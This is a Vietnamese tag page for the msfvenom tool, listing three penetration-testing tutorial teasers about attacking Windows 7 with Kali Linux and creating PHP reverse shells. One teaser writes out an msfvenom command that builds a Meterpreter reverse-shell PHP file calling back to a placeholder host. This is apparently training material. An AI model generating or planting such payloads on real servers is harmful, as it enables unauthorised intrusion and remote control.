Chủ đề: Msfvenom

Có 3 bài viết

Kali linux tấn công windows 7
Kali linux tấn công windows 7

Xin chào, Như bài hôm trước mình đã đề cập, hôm nay thay vì học chay tiếp phần các chức năng đặc biệt của Meterpreter ở task 9, chúng ta sẽ tạm thời bỏ ...

Hướng dẫn generate php reverse shell - tạo trình bao đảo ngược php
Hướng dẫn generate php reverse shell - tạo trình bao đảo ngược php

Reverse shell là gì ?Reverse shell là 1 loại session shell (ngoài ra còn có web shell, bind shell,.. ) là shell có kết nối bắt nguồn từ 1 máy chủ đóng vai trò là target ...

Hướng dẫn msfconsole php reverse shell
Hướng dẫn msfconsole php reverse shell

Requirements: Write access to webserver.Generate malicious PHP file: msfvenom -p php/meterpreter/reverse_tcp LHOST=<$LOCAL_IP> LPORT=<$LOCAL_PORT> -f raw -o shell.php Run msfconsole to ...